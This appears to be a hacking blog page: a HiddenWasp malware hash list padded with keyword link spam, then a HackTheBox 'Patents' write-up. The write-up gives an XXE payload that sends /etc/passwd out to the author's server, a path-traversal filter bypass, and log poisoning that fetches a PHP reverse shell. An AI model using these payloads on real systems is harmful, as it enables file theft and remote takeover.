Saturday, June 3, 2023

HiddenWasp Linux Malware Backdoor Samples





Intezer HiddenWasp Malware Stings Targeted Linux Systems 




Links updated: Jan 19, 2023


File informatio


8914fd1cfade5059e626be90f18972ec963bbed75101c7fbf4a88a6da2bc671b
8f1c51c4963c0bad6cf04444feb411d7
 shell

f321685342fa373c33eb9479176a086a1c56c90a1826a0aef3450809ffc01e5d
52137157fdf019145d7f524d1da884d7
elf

f38ab11c28e944536e00ca14954df5f4d08c1222811fef49baded5009bbbc9a2
ba02a964d08c2afe41963bf897d385e7
shell

e9e2e84ed423bfc8e82eb434cede5c9568ab44e7af410a85e5d5eb24b1e622e3
cbcda5c0dba07faced5f4641aab1e2cd
 elf shared-lib

d66bbbccd19587e67632585d0ac944e34e4d5fa2b9f3bb3f900f517c7bbf518b
2b13e6f7d9fafd2eca809bba4b5ea9a6
64bits elf shared-lib

2ea291aeb0905c31716fe5e39ff111724a3c461e3029830d2bfa77c1b3656fc0
568d1ebd8b6fb17744d3c70837e801b9
shell

8e3b92e49447a67ed32b3afadbc24c51975ff22acbd0cf8090b078c0a4a7b53d
33c3f807caea64293add29719596f156
 shell

609bbf4ccc2cb0fcbe0d5891eea7d97a05a0b29431c468bf3badd83fc4414578
71d78c97eb0735ec6152a6ff6725b9b2
tar-bundle gzip contains-elf

d596acc70426a16760a2b2cc78ca2cc65c5a23bb79316627c0b2e16489bf86c0
6d1cd68384de9839357a8be27894182b
 tar-bundle gzip

0fe1248ecab199bee383cef69f2de77d33b269ad1664127b366a4e745b1199c8
5b134e0a1a89a6c85f13e08e82ea35c3
64bits elf 
Related word

Hackerhubb.blogspot.com

Hackerhubb.blogspot.com

Related links


  1. Hacker Tools Linux
  2. Hacker Tools For Pc
  3. Hak5 Tools
  4. Pentest Tools For Android
  5. Physical Pentest Tools
  6. Pentest Tools Review
  7. What Are Hacking Tools
  8. Hacking Tools Download
  9. Tools For Hacker
  10. Pentest Tools For Android
  11. Pentest Box Tools Download
  12. Usb Pentest Tools
  13. Pentest Tools Alternative
  14. Pentest Tools Apk
  15. Hacker Hardware Tools
  16. Hacking Tools And Software
  17. Hacking Tools For Pc
  18. Pentest Tools Find Subdomains
  19. Black Hat Hacker Tools
  20. Hacking Tools Hardware
  21. Hacker Tool Kit
  22. Hacker
  23. Hacker Hardware Tools
  24. Pentest Tools For Android
  25. Hacker Tools Windows
  26. Hacker Security Tools
  27. Hacking Tools For Windows Free Download
  28. Hack Tools 2019
  29. Pentest Tools For Android
  30. Hacker Tools Software
  31. Hack Tools For Games
  32. Pentest Tools Review
  33. Pentest Recon Tools
  34. Hacking Tools And Software
  35. Hacking Tools Software
  36. Hack Tools Pc
  37. Hacking Tools For Kali Linux
  38. Hack Rom Tools
  39. Hack Tools For Pc
  40. Hacking Tools Kit
  41. Top Pentest Tools
  42. Hacker Tools Linux
  43. Hacker Tools Free
  44. Hack Tool Apk No Root
  45. What Is Hacking Tools
  46. Pentest Tools Framework
  47. Hacker Tools Apk
  48. Pentest Tools Apk
  49. Pentest Tools Port Scanner
  50. Hacker Tools 2019
  51. Hack Tool Apk
  52. Hacker Search Tools
  53. Hacker Tools List
  54. Pentest Tools
  55. Hacker Tools Apk Download
  56. Hack App
  57. What Is Hacking Tools
  58. World No 1 Hacker Software
  59. Hackrf Tools
  60. Game Hacking
  61. Install Pentest Tools Ubuntu
  62. Pentest Tools For Mac
  63. How To Hack
  64. Tools Used For Hacking
  65. Pentest Tools Free
  66. Usb Pentest Tools
  67. Hacker Tools List
  68. Hacker Techniques Tools And Incident Handling
  69. Hackers Toolbox
  70. Hack Tools
  71. Hacker Security Tools
  72. Pentest Tools Bluekeep
  73. Hacker Tools 2020
  74. Hacking Tools Online
  75. Pentest Tools Alternative
  76. Nsa Hack Tools
  77. Pentest Tools Github
  78. Pentest Tools Linux
  79. How To Hack
  80. Hacker Tools 2020
  81. Hacking Tools Windows
  82. Wifi Hacker Tools For Windows
  83. Hacker Tools Windows
  84. Hacker Tools Apk
  85. Best Pentesting Tools 2018
  86. Pentest Tools Github
  87. Ethical Hacker Tools
  88. Pentest Tools Find Subdomains
  89. Pentest Box Tools Download
  90. Hacking Tools For Beginners
  91. Hacker Tools Apk
  92. Nsa Hack Tools Download
  93. Hacking Tools For Windows
  94. Hacker Tools For Pc
  95. Pentest Tools Website Vulnerability
  96. Ethical Hacker Tools
  97. Hacker Tools Mac
  98. Hack Tools For Windows
  99. Hacker Tools For Windows
  100. What Is Hacking Tools
  101. Hack Tools Github
  102. Hacking Tools Online
  103. Hacking Tools 2020
  104. Pentest Tools For Android
  105. Best Hacking Tools 2020
  106. Hacks And Tools
  107. Hacker Tools 2019
  108. Hack Tools For Windows
  109. Pentest Tools Subdomain
  110. Hack Tools Github
  111. Hack Tools For Windows
  112. Hacker Tools Mac
  113. Hacker Tools Free
  114. Hacking Apps
  115. Best Hacking Tools 2019
  116. Hack Apps
  117. Hacker Tools Linux
  118. Hacking Tools For Windows 7
  119. Hacker Tools Linux
  120. Best Pentesting Tools 2018
  121. Hacking Tools For Kali Linux
  122. What Are Hacking Tools
  123. Hack And Tools
  124. Pentest Tools Free

WHY WE DO HACKING?

Purpose of Hacking?
. Just for fun
.Show-off
.Steal important information 
.Damaging the system
.Hampering Privacy
.Money Extortion 
.System Security Testing
.To break policy compliance etc

Related posts
  1. Nsa Hack Tools Download
  2. Hacking Tools 2020
  3. Pentest Tools For Windows
  4. Tools For Hacker
  5. Hack App
  6. World No 1 Hacker Software
  7. Growth Hacker Tools
  8. Pentest Tools Tcp Port Scanner
  9. Black Hat Hacker Tools
  10. Hackrf Tools
  11. Android Hack Tools Github
  12. Pentest Tools Tcp Port Scanner
  13. Easy Hack Tools
  14. Pentest Automation Tools
  15. Hacker Tools For Pc
  16. Hacking Tools 2019
  17. Hackrf Tools
  18. Hacking Tools 2019
  19. Pentest Automation Tools
  20. Pentest Tools Apk
  21. Hacker Hardware Tools
  22. Hacking Tools Windows
  23. Pentest Tools For Ubuntu
  24. Pentest Tools Website
  25. Best Hacking Tools 2020
  26. Tools For Hacker
  27. Free Pentest Tools For Windows
  28. Hacker Tools For Mac
  29. Hack App
  30. Hack Tools Online
  31. Physical Pentest Tools
  32. Pentest Tools Review
  33. Hack Tools For Games
  34. Best Hacking Tools 2019
  35. Hacking Tools 2020
  36. Hacking Tools
  37. Hacking Tools Pc
  38. Install Pentest Tools Ubuntu
  39. Tools 4 Hack
  40. Hacking Tools
  41. Hacking Tools For Mac
  42. Hacking Tools Name
  43. Hacking Tools Name
  44. Hacker Tools Mac
  45. Best Pentesting Tools 2018
  46. Hack Apps
  47. Hacking Tools Hardware
  48. How To Hack
  49. Easy Hack Tools
  50. Hackers Toolbox
  51. Hack Tool Apk

Friday, June 2, 2023

XXE In Docx Files And LFI To RCE


In this article we are going to talk about XXE injection and we will also look at LFI in a little more advanced perspective. I will be performing both of these attacks on a HackTheBox machine called Patents which was a really hard machine. I am not going to show you how to solve the Patents machine rather I will show you how to perform the above mentioned attacks on the box.

XML External Entity Attack

Lets start with what an XXE injection means. OWASP has put XXE on number 4 of OWASP Top Ten 2017 and describes XXE in the following words: "An XML External Entity attack is a type of attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, server side request forgery, port scanning from the perspective of the machine where the parser is located, and other system impacts."
What that means is if you have an XML parser which is not properly configured to parse the input data you may end you getting yourself screwed. On the Patents box there is an upload form which lets us upload a word document (docx) and then parses it to convert it into a pdf document. You may be thinking but where is the XML document involved here. Well it turns out that the docx files are made up of multiple XML documents archived together. Read more about it in the article OpenXML in word processing – Custom XML part – mapping flat data. It turns out that the docx2pdf parser of the Patents machine is poorly configured to allow XXE injection attacks but to perform that attack we need to inject out XXE payload in the docx file. First lets upload a simple docx file to the server and see what happens.

After uploading the file we get a Download option to download the pdf file that was created from our docx file.

As can be seen, the functionality works as expected.

Now lets exploit it. What we have to do is that we have to inject our XXE payload in the docx file so that the poorly configured XML parser on the server parses our payload and allows us to exfil data from the server. To do that we will perform these steps.
  1. Extract the docx file.
  2. Embed our payload in the extracted files.
  3. Archive the file back in the docx format.
  4. Upload the file on the server.
To extract the docx file we will use the unzip Linux command line tool.
mkdir doc cd doc unzip ../sample.docx 
Following the article mentioned above we see that we can embed custom XML to the docx file by creating a directory (folder) called customXml inside the extracted folder and add an item1.xml file which will contain our payload.
mkdir customXml cd customXml vim item1.xml 
Lets grab an XXE payload from PayloadsAllTheThings GitHub repo and modify it a bit which looks like this:
<?xml version="1.0" ?> <!DOCTYPE r [ <!ELEMENT r ANY > <!ENTITY % sp SYSTEM "http://10.10.14.56:8090/dtd.xml"> %sp; %param1; ]> <r>&exfil;</r> 
Notice the IP address in the middle of the payload, this IP address points to my python server which I'm going to host on my machine shortly on port 8090. The contents of the dtd.xml file that is being accessed by the payload is:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd"> <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.56:8090/dtd.xml?%data;'>"> 
What this xml file is doing is that it is requesting the /etc/passwd file on the local server of the XML parser and then encoding the contents of /etc/passwd into base64 format (the encoding is done because that contents of the /etc/passwd file could be something that can break the request). Now lets zip the un-archived files back to the docx file using the zip linux command line tool.
zip -r sample.docx * 
here -r means recursive and * means all files sample.docx is the output file.
Lets summarize the attack a bit before performing it. We created a docx file with an XXE payload, the payload will ping back to our server looking for a file named dtd.xml. dtd.xml file will be parsed by the XML parser on the server in the context of the server. Grabbing the /etc/passwd file from the server encoding it using base64 and then sends that base64 encoded data back to us in the request.
Now lets fire-up our simple http python server in the same directory we kept our dtd.xml file:
python -m SimpleHTTPServer 8090 
and then upload the file to the server and see if it works.
We got a hit on our python server from the target server looking for the dtd.xml file and we can see a 200 OK besides the request.
Below the request for dtd.xml we can see another request which was made by the target server to our server and appended to the end of this request is the base64 encoded data. We grab everything coming after the ? of the request and copy it to a file say passwd.b64 and after that we use the base64 linux command line tool to decode the base64 data like this:
cat passwd.64 | base64 -d > passwd
looking at the contents of passwd file we can confirm that it is indeed the /etc/passwd file from the target server. Now we can exfiltrate other files as well from the server but remember we can only exfiltrate those files from the server to which the user running the web application has read permissions. To extract other files we simple have to change the dtd.xml file, we don't need to change our docx file. Change the dtd.xml file and then upload the sample.docx file to the server and get the contents of another file.

LFI to RCE

Now getting to the part two of the article which is LFI to RCE, the box is also vulnerable to LFI injection you can read about simple LFI in one of my previous article Learning Web Pentesting With DVWA Part 6: File Inclusion, in this article we are going a bit more advanced. The URL that is vulnerable to LFI on the machine is:
http://10.10.10.173/getPatent_alphav1.0.php 

We can use the id parameter to view the uploaded patents like this:
http://10.10.10.173/getPatent_alphav1.0.php?id=1 

The patents are basically local document files on the server, lets try to see if we can read other local files on the server using the id parameter. We try our LFI payloads and it doesn't seem to work.

Maybe its using a mechanism to prevent LFI attacks. After reading the source for getPatent_alphav1.0.php from previous vulnerability we can see it is flagging ../ in the request. To bypass that restriction we will use ..././, first two dots and the slash will be removed from ..././ and what will be left is ../, lets try it out:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././etc/passwd 

Wohoo! we got it but now what? To get an RCE we will check if we can access the apache access log file
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log 
As we can see we are able to access the apache access log file lets try to get an RCE via access logs. How this works is basically simple, the access.log file logs all the access requests to the apache server. We will include php code in our request to the server, this malicious request will be logged in the access.log file. Then using the LFI we will access the access.log file. As we access the access.log file via the LFI, the php code in our request will be executed and we will have an RCE. First lets grab a php reverse shell from pentest monkey's GitHub repo, modify the ip and port variables  to our own ip and port, and put it into the directory which our python server is hosting. I have renamed the file to shell.php for simplicity here.
Lets setup our reverse shell listener:
nc -lvnp 9999 
and then perfrom a request to the target server with our php code like this:
curl "http://10.10.10.173/<?php system('curl\$\{IFS\}http://10.10.14.56:8090/shell.php');?>" 
and lastly lets access the apache access.log file via the LFI on the target server:
http://10.10.10.173/getPatent_alphav1.0.php?id=..././..././..././..././..././..././..././var/log/apache2/access.log3 
Boom! we have a shell.

That's it for today's article see you next time.

References

Read more